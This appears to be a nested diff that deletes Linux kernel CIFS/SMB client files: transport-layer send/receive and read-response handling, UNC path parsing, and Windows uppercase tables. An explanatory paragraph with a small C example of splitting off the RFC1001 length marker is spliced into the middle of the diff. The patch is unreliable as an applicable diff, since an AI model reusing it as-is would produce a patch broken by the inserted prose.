+-			midQ[i]->mid_flags |= MID_WAIT_CANCELLED;
+-			if (midQ[i]->mid_state == MID_REQUEST_SUBMITTED) {
+-				midQ[i]->callback = cifs_cancelled_callback;
+-				cancelled_mid[i] = true;
+-				credits[i].value = 0;
+-			}
+-			spin_unlock(&server->mid_lock);
+-		}
+-	}
+-
+-	for (i = 0; i < num_rqst; i++) {
+-		if (rc < 0)
+-			goto out;
+-
+-		rc = cifs_sync_mid_result(midQ[i], server);
+-		if (rc != 0) {
+-			/* mark this mid as cancelled to not free it below */
+-			cancelled_mid[i] = true;
+-			goto out;
+-		}
+-
+-		if (!midQ[i]->resp_buf ||
+-		    midQ[i]->mid_state != MID_RESPONSE_RECEIVED) {
+-			rc = -EIO;
+-			cifs_dbg(FYI, "Bad MID state?\n");
+-			goto out;
+-		}
+-
+-		buf = (char *)midQ[i]->resp_buf;
+-		resp_iov[i].iov_base = buf;
+-		resp_iov[i].iov_len = midQ[i]->resp_buf_size +
+-			HEADER_PREAMBLE_SIZE(server);
+-
+-		if (midQ[i]->large_buf)
+-			resp_buf_type[i] = CIFS_LARGE_BUFFER;
+-		else
+-			resp_buf_type[i] = CIFS_SMALL_BUFFER;
+-
+-		rc = server->ops->check_receive(midQ[i], server,
+-						     flags & CIFS_LOG_ERROR);
+-
+-		/* mark it so buf will not be freed by delete_mid */
+-		if ((flags & CIFS_NO_RSP_BUF) == 0)
+-			midQ[i]->resp_buf = NULL;
+-
+-	}
+-
+-	/*
+-	 * Compounding is never used during session establish.
+-	 */
+-	spin_lock(&ses->ses_lock);
+-	if ((ses->ses_status == SES_NEW) || (optype & CIFS_NEG_OP) || (optype & CIFS_SESS_OP)) {
+-		struct kvec iov = {
+-			.iov_base = resp_iov[0].iov_base,
+-			.iov_len = resp_iov[0].iov_len
+-		};
+-		spin_unlock(&ses->ses_lock);
+-		cifs_server_lock(server);
+-		smb311_update_preauth_hash(ses, server, &iov, 1);
+-		cifs_server_unlock(server);
+-		spin_lock(&ses->ses_lock);
+-	}
+-	spin_unlock(&ses->ses_lock);
+-
+-out:
+-	/*
+-	 * This will dequeue all mids. After this it is important that the
+-	 * demultiplex_thread will not process any of these mids any further.
+-	 * This is prevented above by using a noop callback that will not
+-	 * wake this thread except for the very last PDU.
+-	 */
+-	for (i = 0; i < num_rqst; i++) {
+-		if (!cancelled_mid[i])
+-			delete_mid(midQ[i]);
+-	}
+-
+-	return rc;
+-}
+-
+-int
+-cifs_send_recv(const unsigned int xid, struct cifs_ses *ses,
+-	       struct TCP_Server_Info *server,
+-	       struct smb_rqst *rqst, int *resp_buf_type, const int flags,
+-	       struct kvec *resp_iov)
+-{
+-	return compound_send_recv(xid, ses, server, flags, 1,
+-				  rqst, resp_buf_type, resp_iov);
+-}
+-
+-int
+-SendReceive2(const unsigned int xid, struct cifs_ses *ses,
+-	     struct kvec *iov, int n_vec, int *resp_buf_type /* ret */,
+-	     const int flags, struct kvec *resp_iov)
+-{
+-	struct smb_rqst rqst;
+-	struct kvec s_iov[CIFS_MAX_IOV_SIZE], *new_iov;
+-	int rc;
+-
+-	if (n_vec + 1 > CIFS_MAX_IOV_SIZE) {
+-		new_iov = kmalloc_array(n_vec + 1, sizeof(struct kvec),
+-					GFP_KERNEL);
+-		if (!new_iov) {
+-			/* otherwise cifs_send_recv below sets resp_buf_type */
+-			*resp_buf_type = CIFS_NO_BUFFER;
+-			return -ENOMEM;
+-		}
+-	} else
+-		new_iov = s_iov;
+-
+-	/* 1st iov is an RFC1001 length followed by the rest of the packet */
+-	memcpy(new_iov + 1, iov, (sizeof(struct kvec) * n_vec));
+-
+-	new_iov[0].iov_base = new_iov[1].iov_base;
+-	new_iov[0].iov_len = 4;
+-	new_iov[1].iov_base += 4;
+-	new_iov[1].iov_len -= 4;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = new_iov;
+-	rqst.rq_nvec = n_vec + 1;
+-
+-	rc = cifs_send_recv(xid, ses, ses->server,
+-			    &rqst, resp_buf_type, flags, resp_iov);
+-	if (n_vec + 1 > CIFS_MAX_IOV_SIZE)
+-		kfree(new_iov);
+-	return rc;
+-}
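SendReceive2() above inserts an extra iovec so the 4-byte RFC1001
length marker travels separately from the SMB body: iov[0] points at
the first 4 bytes of the caller's buffer and iov[1] at everything after
them. A minimal sketch of that split; split_rfc1001() is a hypothetical
standalone helper.

#include <stdio.h>
#include <sys/uio.h>

static void split_rfc1001(char *buf, size_t len, struct iovec iov[2])
{
	iov[0].iov_base = buf;		/* 4-byte RFC1001 length marker */
	iov[0].iov_len  = 4;
	iov[1].iov_base = buf + 4;	/* rest of the SMB packet */
	iov[1].iov_len  = len - 4;
}

int main(void)
{
	char frame[64] = { 0 };		/* placeholder frame */
	struct iovec iov[2];

	split_rfc1001(frame, sizeof(frame), iov);
	printf("marker=%zu body=%zu\n", iov[0].iov_len, iov[1].iov_len);
	return 0;
}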
+-
+-int
+-SendReceive(const unsigned int xid, struct cifs_ses *ses,
+-	    struct smb_hdr *in_buf, struct smb_hdr *out_buf,
+-	    int *pbytes_returned, const int flags)
+-{
+-	int rc = 0;
+-	struct mid_q_entry *midQ;
+-	unsigned int len = be32_to_cpu(in_buf->smb_buf_length);
+-	struct kvec iov = { .iov_base = in_buf, .iov_len = len };
+-	struct smb_rqst rqst = { .rq_iov = &iov, .rq_nvec = 1 };
+-	struct cifs_credits credits = { .value = 1, .instance = 0 };
+-	struct TCP_Server_Info *server;
+-
+-	if (ses == NULL) {
+-		cifs_dbg(VFS, "Null smb session\n");
+-		return -EIO;
+-	}
+-	server = ses->server;
+-	if (server == NULL) {
+-		cifs_dbg(VFS, "Null tcp session\n");
+-		return -EIO;
+-	}
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsExiting) {
+-		spin_unlock(&server->srv_lock);
+-		return -ENOENT;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	/* Ensure that we do not send more than 50 overlapping requests
+-	   to the same server. We may make this configurable later or
+-	   use ses->maxReq */
+-
+-	if (len > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
+-		cifs_server_dbg(VFS, "Invalid length, greater than maximum frame, %d\n",
+-				len);
+-		return -EIO;
+-	}
+-
+-	rc = wait_for_free_request(server, flags, &credits.instance);
+-	if (rc)
+-		return rc;
+-
+-	/* make sure that we sign in the same order that we send on this socket
+-	   and avoid races inside tcp sendmsg code that could cause corruption
+-	   of smb data */
+-
+-	cifs_server_lock(server);
+-
+-	rc = allocate_mid(ses, in_buf, &midQ);
+-	if (rc) {
+-		cifs_server_unlock(server);
+-		/* Update # of requests on wire to server */
+-		add_credits(server, &credits, 0);
+-		return rc;
+-	}
+-
+-	rc = cifs_sign_smb(in_buf, server, &midQ->sequence_number);
+-	if (rc) {
+-		cifs_server_unlock(server);
+-		goto out;
+-	}
+-
+-	midQ->mid_state = MID_REQUEST_SUBMITTED;
+-
+-	rc = smb_send(server, in_buf, len);
+-	cifs_save_when_sent(midQ);
+-
+-	if (rc < 0)
+-		server->sequence_number -= 2;
+-
+-	cifs_server_unlock(server);
+-
+-	if (rc < 0)
+-		goto out;
+-
+-	rc = wait_for_response(server, midQ);
+-	if (rc != 0) {
+-		send_cancel(server, &rqst, midQ);
+-		spin_lock(&server->mid_lock);
+-		if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
+-			/* no longer considered to be "in-flight" */
+-			midQ->callback = release_mid;
+-			spin_unlock(&server->mid_lock);
+-			add_credits(server, &credits, 0);
+-			return rc;
+-		}
+-		spin_unlock(&server->mid_lock);
+-	}
+-
+-	rc = cifs_sync_mid_result(midQ, server);
+-	if (rc != 0) {
+-		add_credits(server, &credits, 0);
+-		return rc;
+-	}
+-
+-	if (!midQ->resp_buf || !out_buf ||
+-	    midQ->mid_state != MID_RESPONSE_RECEIVED) {
+-		rc = -EIO;
+-		cifs_server_dbg(VFS, "Bad MID state?\n");
+-		goto out;
+-	}
+-
+-	*pbytes_returned = get_rfc1002_length(midQ->resp_buf);
+-	memcpy(out_buf, midQ->resp_buf, *pbytes_returned + 4);
+-	rc = cifs_check_receive(midQ, server, 0);
+-out:
+-	delete_mid(midQ);
+-	add_credits(server, &credits, 0);
+-
+-	return rc;
+-}
+-
+-/* We send a LOCKINGX_CANCEL_LOCK to cause the Windows
+-   blocking lock to return. */
+-
+-static int
+-send_lock_cancel(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct smb_hdr *in_buf,
+-			struct smb_hdr *out_buf)
+-{
+-	int bytes_returned;
+-	struct cifs_ses *ses = tcon->ses;
+-	LOCK_REQ *pSMB = (LOCK_REQ *)in_buf;
+-
+-	/* We just modify the current in_buf to change
+-	   the type of lock from LOCKING_ANDX_SHARED_LOCK
+-	   or LOCKING_ANDX_EXCLUSIVE_LOCK to
+-	   LOCKING_ANDX_CANCEL_LOCK. */
+-
+-	pSMB->LockType = LOCKING_ANDX_CANCEL_LOCK|LOCKING_ANDX_LARGE_FILES;
+-	pSMB->Timeout = 0;
+-	pSMB->hdr.Mid = get_next_mid(ses->server);
+-
+-	return SendReceive(xid, ses, in_buf, out_buf,
+-			&bytes_returned, 0);
+-}
+-
+-int
+-SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
+-	    struct smb_hdr *in_buf, struct smb_hdr *out_buf,
+-	    int *pbytes_returned)
+-{
+-	int rc = 0;
+-	int rstart = 0;
+-	struct mid_q_entry *midQ;
+-	struct cifs_ses *ses;
+-	unsigned int len = be32_to_cpu(in_buf->smb_buf_length);
+-	struct kvec iov = { .iov_base = in_buf, .iov_len = len };
+-	struct smb_rqst rqst = { .rq_iov = &iov, .rq_nvec = 1 };
+-	unsigned int instance;
+-	struct TCP_Server_Info *server;
+-
+-	if (tcon == NULL || tcon->ses == NULL) {
+-		cifs_dbg(VFS, "Null smb session\n");
+-		return -EIO;
+-	}
+-	ses = tcon->ses;
+-	server = ses->server;
+-
+-	if (server == NULL) {
+-		cifs_dbg(VFS, "Null tcp session\n");
+-		return -EIO;
+-	}
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsExiting) {
+-		spin_unlock(&server->srv_lock);
+-		return -ENOENT;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	/* Ensure that we do not send more than 50 overlapping requests
+-	   to the same server. We may make this configurable later or
+-	   use ses->maxReq */
+-
+-	if (len > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
+-		cifs_tcon_dbg(VFS, "Invalid length, greater than maximum frame, %d\n",
+-			      len);
+-		return -EIO;
+-	}
+-
+-	rc = wait_for_free_request(server, CIFS_BLOCKING_OP, &instance);
+-	if (rc)
+-		return rc;
+-
+-	/* make sure that we sign in the same order that we send on this socket
+-	   and avoid races inside tcp sendmsg code that could cause corruption
+-	   of smb data */
+-
+-	cifs_server_lock(server);
+-
+-	rc = allocate_mid(ses, in_buf, &midQ);
+-	if (rc) {
+-		cifs_server_unlock(server);
+-		return rc;
+-	}
+-
+-	rc = cifs_sign_smb(in_buf, server, &midQ->sequence_number);
+-	if (rc) {
+-		delete_mid(midQ);
+-		cifs_server_unlock(server);
+-		return rc;
+-	}
+-
+-	midQ->mid_state = MID_REQUEST_SUBMITTED;
+-	rc = smb_send(server, in_buf, len);
+-	cifs_save_when_sent(midQ);
+-
+-	if (rc < 0)
+-		server->sequence_number -= 2;
+-
+-	cifs_server_unlock(server);
+-
+-	if (rc < 0) {
+-		delete_mid(midQ);
+-		return rc;
+-	}
+-
+-	/* Wait for a reply - allow signals to interrupt. */
+-	rc = wait_event_interruptible(server->response_q,
+-		(!(midQ->mid_state == MID_REQUEST_SUBMITTED)) ||
+-		((server->tcpStatus != CifsGood) &&
+-		 (server->tcpStatus != CifsNew)));
+-
+-	/* Were we interrupted by a signal ? */
+-	spin_lock(&server->srv_lock);
+-	if ((rc == -ERESTARTSYS) &&
+-		(midQ->mid_state == MID_REQUEST_SUBMITTED) &&
+-		((server->tcpStatus == CifsGood) ||
+-		 (server->tcpStatus == CifsNew))) {
+-		spin_unlock(&server->srv_lock);
+-
+-		if (in_buf->Command == SMB_COM_TRANSACTION2) {
+-			/* POSIX lock. We send an NT_CANCEL SMB to cause the
+-			   blocking lock to return. */
+-			rc = send_cancel(server, &rqst, midQ);
+-			if (rc) {
+-				delete_mid(midQ);
+-				return rc;
+-			}
+-		} else {
+-			/* Windows lock. We send a LOCKINGX_CANCEL_LOCK
+-			   to cause the blocking lock to return. */
+-
+-			rc = send_lock_cancel(xid, tcon, in_buf, out_buf);
+-
+-			/* If we get -ENOLCK back the lock may have
+-			   already been removed. Don't exit in this case. */
+-			if (rc && rc != -ENOLCK) {
+-				delete_mid(midQ);
+-				return rc;
+-			}
+-		}
+-
+-		rc = wait_for_response(server, midQ);
+-		if (rc) {
+-			send_cancel(server, &rqst, midQ);
+-			spin_lock(&server->mid_lock);
+-			if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
+-				/* no longer considered to be "in-flight" */
+-				midQ->callback = release_mid;
+-				spin_unlock(&server->mid_lock);
+-				return rc;
+-			}
+-			spin_unlock(&server->mid_lock);
+-		}
+-
+-		/* We got the response - restart system call. */
+-		rstart = 1;
+-		spin_lock(&server->srv_lock);
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	rc = cifs_sync_mid_result(midQ, server);
+-	if (rc != 0)
+-		return rc;
+-
+-	/* rcvd frame is ok */
+-	if (out_buf == NULL || midQ->mid_state != MID_RESPONSE_RECEIVED) {
+-		rc = -EIO;
+-		cifs_tcon_dbg(VFS, "Bad MID state?\n");
+-		goto out;
+-	}
+-
+-	*pbytes_returned = get_rfc1002_length(midQ->resp_buf);
+-	memcpy(out_buf, midQ->resp_buf, *pbytes_returned + 4);
+-	rc = cifs_check_receive(midQ, server, 0);
+-out:
+-	delete_mid(midQ);
+-	if (rstart && rc == -EACCES)
+-		return -ERESTARTSYS;
+-	return rc;
+-}
+-
+-/*
+- * Discard any remaining data in the current SMB. To do this, we borrow the
+- * current bigbuf.
+- */
+-int
+-cifs_discard_remaining_data(struct TCP_Server_Info *server)
+-{
+-	unsigned int rfclen = server->pdu_size;
+-	int remaining = rfclen + HEADER_PREAMBLE_SIZE(server) -
+-		server->total_read;
+-
+-	while (remaining > 0) {
+-		int length;
+-
+-		length = cifs_discard_from_socket(server,
+-				min_t(size_t, remaining,
+-				      CIFSMaxBufSize + MAX_HEADER_SIZE(server)));
+-		if (length < 0)
+-			return length;
+-		server->total_read += length;
+-		remaining -= length;
+-	}
+-
+-	return 0;
+-}
+-
+-static int
+-__cifs_readv_discard(struct TCP_Server_Info *server, struct mid_q_entry *mid,
+-		     bool malformed)
+-{
+-	int length;
+-
+-	length = cifs_discard_remaining_data(server);
+-	dequeue_mid(mid, malformed);
+-	mid->resp_buf = server->smallbuf;
+-	server->smallbuf = NULL;
+-	return length;
+-}
+-
+-static int
+-cifs_readv_discard(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+-{
+-	struct cifs_readdata *rdata = mid->callback_data;
+-
+-	return  __cifs_readv_discard(server, mid, rdata->result);
+-}
+-
+-int
+-cifs_readv_receive(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+-{
+-	int length, len;
+-	unsigned int data_offset, data_len;
+-	struct cifs_readdata *rdata = mid->callback_data;
+-	char *buf = server->smallbuf;
+-	unsigned int buflen = server->pdu_size + HEADER_PREAMBLE_SIZE(server);
+-	bool use_rdma_mr = false;
+-
+-	cifs_dbg(FYI, "%s: mid=%llu offset=%llu bytes=%u\n",
+-		 __func__, mid->mid, rdata->offset, rdata->bytes);
+-
+-	/*
+-	 * read the rest of READ_RSP header (sans Data array), or whatever we
+-	 * can if there's not enough data. At this point, we've read down to
+-	 * the Mid.
+-	 */
+-	len = min_t(unsigned int, buflen, server->vals->read_rsp_size) -
+-							HEADER_SIZE(server) + 1;
+-
+-	length = cifs_read_from_socket(server,
+-				       buf + HEADER_SIZE(server) - 1, len);
+-	if (length < 0)
+-		return length;
+-	server->total_read += length;
+-
+-	if (server->ops->is_session_expired &&
+-	    server->ops->is_session_expired(buf)) {
+-		cifs_reconnect(server, true);
+-		return -1;
+-	}
+-
+-	if (server->ops->is_status_pending &&
+-	    server->ops->is_status_pending(buf, server)) {
+-		cifs_discard_remaining_data(server);
+-		return -1;
+-	}
+-
+-	/* set up first two iov for signature check and to get credits */
+-	rdata->iov[0].iov_base = buf;
+-	rdata->iov[0].iov_len = HEADER_PREAMBLE_SIZE(server);
+-	rdata->iov[1].iov_base = buf + HEADER_PREAMBLE_SIZE(server);
+-	rdata->iov[1].iov_len =
+-		server->total_read - HEADER_PREAMBLE_SIZE(server);
+-	cifs_dbg(FYI, "0: iov_base=%p iov_len=%zu\n",
+-		 rdata->iov[0].iov_base, rdata->iov[0].iov_len);
+-	cifs_dbg(FYI, "1: iov_base=%p iov_len=%zu\n",
+-		 rdata->iov[1].iov_base, rdata->iov[1].iov_len);
+-
+-	/* Was the SMB read successful? */
+-	rdata->result = server->ops->map_error(buf, false);
+-	if (rdata->result != 0) {
+-		cifs_dbg(FYI, "%s: server returned error %d\n",
+-			 __func__, rdata->result);
+-		/* normal error on read response */
+-		return __cifs_readv_discard(server, mid, false);
+-	}
+-
+-	/* Is there enough to get to the rest of the READ_RSP header? */
+-	if (server->total_read < server->vals->read_rsp_size) {
+-		cifs_dbg(FYI, "%s: server returned short header. got=%u expected=%zu\n",
+-			 __func__, server->total_read,
+-			 server->vals->read_rsp_size);
+-		rdata->result = -EIO;
+-		return cifs_readv_discard(server, mid);
+-	}
+-
+-	data_offset = server->ops->read_data_offset(buf) +
+-		HEADER_PREAMBLE_SIZE(server);
+-	if (data_offset < server->total_read) {
+-		/*
+-		 * win2k8 sometimes sends an offset of 0 when the read
+-		 * is beyond the EOF. Treat it as if the data starts just after
+-		 * the header.
+-		 */
+-		cifs_dbg(FYI, "%s: data offset (%u) inside read response header\n",
+-			 __func__, data_offset);
+-		data_offset = server->total_read;
+-	} else if (data_offset > MAX_CIFS_SMALL_BUFFER_SIZE) {
+-		/* data_offset is beyond the end of smallbuf */
+-		cifs_dbg(FYI, "%s: data offset (%u) beyond end of smallbuf\n",
+-			 __func__, data_offset);
+-		rdata->result = -EIO;
+-		return cifs_readv_discard(server, mid);
+-	}
+-
+-	cifs_dbg(FYI, "%s: total_read=%u data_offset=%u\n",
+-		 __func__, server->total_read, data_offset);
+-
+-	len = data_offset - server->total_read;
+-	if (len > 0) {
+-		/* read any junk before data into the rest of smallbuf */
+-		length = cifs_read_from_socket(server,
+-					       buf + server->total_read, len);
+-		if (length < 0)
+-			return length;
+-		server->total_read += length;
+-	}
+-
+-	/* how much data is in the response? */
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	use_rdma_mr = rdata->mr;
+-#endif
+-	data_len = server->ops->read_data_length(buf, use_rdma_mr);
+-	if (!use_rdma_mr && (data_offset + data_len > buflen)) {
+-		/* data_len is corrupt -- discard frame */
+-		rdata->result = -EIO;
+-		return cifs_readv_discard(server, mid);
+-	}
+-
+-	length = rdata->read_into_pages(server, rdata, data_len);
+-	if (length < 0)
+-		return length;
+-
+-	server->total_read += length;
+-
+-	cifs_dbg(FYI, "total_read=%u buflen=%u remaining=%u\n",
+-		 server->total_read, buflen, data_len);
+-
+-	/* discard anything left over */
+-	if (server->total_read < buflen)
+-		return cifs_readv_discard(server, mid);
+-
+-	dequeue_mid(mid, false);
+-	mid->resp_buf = server->smallbuf;
+-	server->smallbuf = NULL;
+-	return length;
+-}
+diff --git a/fs/cifs/unc.c b/fs/cifs/unc.c
+deleted file mode 100644
+index f6fc5e343ea42..0000000000000
+--- a/fs/cifs/unc.c
++++ /dev/null
+@@ -1,69 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2020, Microsoft Corporation.
+- *
+- *   Author(s): Steve French <stfrench@microsoft.com>
+- *              Suresh Jayaraman <sjayaraman@suse.de>
+- *              Jeff Layton <jlayton@kernel.org>
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include <linux/inet.h>
+-#include <linux/ctype.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-
+-/* extract the host portion of the UNC string */
+-char *extract_hostname(const char *unc)
+-{
+-	const char *src;
+-	char *dst, *delim;
+-	unsigned int len;
+-
+-	/* skip double chars at beginning of string */
+-	/* BB: check validity of these bytes? */
+-	if (strlen(unc) < 3)
+-		return ERR_PTR(-EINVAL);
+-	for (src = unc; *src && *src == '\\'; src++)
+-		;
+-	if (!*src)
+-		return ERR_PTR(-EINVAL);
+-
+-	/* delimiter between hostname and sharename is always '\\' now */
+-	delim = strchr(src, '\\');
+-	if (!delim)
+-		return ERR_PTR(-EINVAL);
+-
+-	len = delim - src;
+-	dst = kmalloc((len + 1), GFP_KERNEL);
+-	if (dst == NULL)
+-		return ERR_PTR(-ENOMEM);
+-
+-	memcpy(dst, src, len);
+-	dst[len] = '\0';
+-
+-	return dst;
+-}
+-
+-char *extract_sharename(const char *unc)
+-{
+-	const char *src;
+-	char *delim, *dst;
+-
+-	/* skip double chars at the beginning */
+-	src = unc + 2;
+-
+-	/* share name is always preceded by '\\' now */
+-	delim = strchr(src, '\\');
+-	if (!delim)
+-		return ERR_PTR(-EINVAL);
+-	delim++;
+-
+-	/* caller has to free the memory */
+-	dst = kstrdup(delim, GFP_KERNEL);
+-	if (!dst)
+-		return ERR_PTR(-ENOMEM);
+-
+-	return dst;
+-}
+diff --git a/fs/cifs/winucase.c b/fs/cifs/winucase.c
+deleted file mode 100644
+index 2f075b5b50df0..0000000000000
+--- a/fs/cifs/winucase.c
++++ /dev/null
+@@ -1,649 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *
+- * Copyright (c) Jeffrey Layton <jlayton@redhat.com>, 2013
+- *
+- * The const tables in this file were converted from the following info
+- * provided by Microsoft:
+- *
+- * 3.1.5.3 Mapping UTF-16 Strings to Upper Case:
+- *
+- * https://msdn.microsoft.com/en-us/library/hh877830.aspx
+- * http://www.microsoft.com/en-us/download/details.aspx?displaylang=en&id=10921
+- *
+- * In particular, the table in "Windows 8 Upper Case Mapping Table.txt" was
+- * post-processed using the winucase_convert.pl script.
+- */
+-
+-#include <linux/nls.h>
+-
+-wchar_t cifs_toupper(wchar_t in);  /* quiet sparse */
+-
+-static const wchar_t t2_00[256] = {
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046, 0x0047,
+-	0x0048, 0x0049, 0x004a, 0x004b, 0x004c, 0x004d, 0x004e, 0x004f,
+-	0x0050, 0x0051, 0x0052, 0x0053, 0x0054, 0x0055, 0x0056, 0x0057,
+-	0x0058, 0x0059, 0x005a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+-	0x00c0, 0x00c1, 0x00c2, 0x00c3, 0x00c4, 0x00c5, 0x00c6, 0x00c7,
+-	0x00c8, 0x00c9, 0x00ca, 0x00cb, 0x00cc, 0x00cd, 0x00ce, 0x00cf,
+-	0x00d0, 0x00d1, 0x00d2, 0x00d3, 0x00d4, 0x00d5, 0x00d6, 0x0000,
+-	0x00d8, 0x00d9, 0x00da, 0x00db, 0x00dc, 0x00dd, 0x00de, 0x0178,
+-};
+-
+-static const wchar_t t2_01[256] = {
+-	0x0000, 0x0100, 0x0000, 0x0102, 0x0000, 0x0104, 0x0000, 0x0106,
+-	0x0000, 0x0108, 0x0000, 0x010a, 0x0000, 0x010c, 0x0000, 0x010e,
+-	0x0000, 0x0110, 0x0000, 0x0112, 0x0000, 0x0114, 0x0000, 0x0116,
+-	0x0000, 0x0118, 0x0000, 0x011a, 0x0000, 0x011c, 0x0000, 0x011e,
+-	0x0000, 0x0120, 0x0000, 0x0122, 0x0000, 0x0124, 0x0000, 0x0126,
+-	0x0000, 0x0128, 0x0000, 0x012a, 0x0000, 0x012c, 0x0000, 0x012e,
+-	0x0000, 0x0000, 0x0000, 0x0132, 0x0000, 0x0134, 0x0000, 0x0136,
+-	0x0000, 0x0000, 0x0139, 0x0000, 0x013b, 0x0000, 0x013d, 0x0000,
+-	0x013f, 0x0000, 0x0141, 0x0000, 0x0143, 0x0000, 0x0145, 0x0000,
+-	0x0147, 0x0000, 0x0000, 0x014a, 0x0000, 0x014c, 0x0000, 0x014e,
+-	0x0000, 0x0150, 0x0000, 0x0152, 0x0000, 0x0154, 0x0000, 0x0156,
+-	0x0000, 0x0158, 0x0000, 0x015a, 0x0000, 0x015c, 0x0000, 0x015e,
+-	0x0000, 0x0160, 0x0000, 0x0162, 0x0000, 0x0164, 0x0000, 0x0166,
+-	0x0000, 0x0168, 0x0000, 0x016a, 0x0000, 0x016c, 0x0000, 0x016e,
+-	0x0000, 0x0170, 0x0000, 0x0172, 0x0000, 0x0174, 0x0000, 0x0176,
+-	0x0000, 0x0000, 0x0179, 0x0000, 0x017b, 0x0000, 0x017d, 0x0000,
+-	0x0243, 0x0000, 0x0000, 0x0182, 0x0000, 0x0184, 0x0000, 0x0000,
+-	0x0187, 0x0000, 0x0000, 0x0000, 0x018b, 0x0000, 0x0000, 0x0000,
+-	0x0000, 0x0000, 0x0191, 0x0000, 0x0000, 0x01f6, 0x0000, 0x0000,
+-	0x0000, 0x0198, 0x023d, 0x0000, 0x0000, 0x0000, 0x0220, 0x0000,
+-	0x0000, 0x01a0, 0x0000, 0x01a2, 0x0000, 0x01a4, 0x0000, 0x0000,
+-	0x01a7, 0x0000, 0x0000, 0x0000, 0x0000, 0x01ac, 0x0000, 0x0000,
+-	0x01af, 0x0000, 0x0000, 0x0000, 0x01b3, 0x0000, 0x01b5, 0x0000,
+-	0x0000, 0x01b8, 0x0000, 0x0000, 0x0000, 0x01bc, 0x0000, 0x01f7,
+-	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x01c4, 0x0000,
+-	0x0000, 0x01c7, 0x0000, 0x0000, 0x01ca, 0x0000, 0x01cd, 0x0000,
+-	0x01cf, 0x0000, 0x01d1, 0x0000, 0x01d3, 0x0000, 0x01d5, 0x0000,
+-	0x01d7, 0x0000, 0x01d9, 0x0000, 0x01db, 0x018e, 0x0000, 0x01de,
+-	0x0000, 0x01e0, 0x0000, 0x01e2, 0x0000, 0x01e4, 0x0000, 0x01e6,
+-	0x0000, 0x01e8, 0x0000, 0x01ea, 0x0000, 0x01ec, 0x0000, 0x01ee,
+-	0x0000, 0x0000, 0x0000, 0x01f1, 0x0000, 0x01f4, 0x0000, 0x0000,
+-	0x0000, 0x01f8, 0x0000, 0x01fa, 0x0000, 0x01fc, 0x0000, 0x01fe,
+-};
+-
+-static const wchar_t t2_02[256] = {
+-	0x0000, 0x0200, 0x0000, 0x0202, 0x0000, 0x0204, 0x0000, 0x0206,
+-	0x0000, 0x0208, 0x0000, 0x020a, 0x0000, 0x020c, 0x0000, 0x020e,
+-	0x0000, 0x0210, 0x0000, 0x0212, 0x0000, 0x0214, 0x0000, 0x0216,
+-	0x0000, 0x0218, 0x0000, 0x021a, 0x0000, 0x021c, 0x0000, 0x021e,
+-	0x0000, 0x0000, 0x0000, 0x0222, 0x0000, 0x0224, 0x0000, 0x0226,
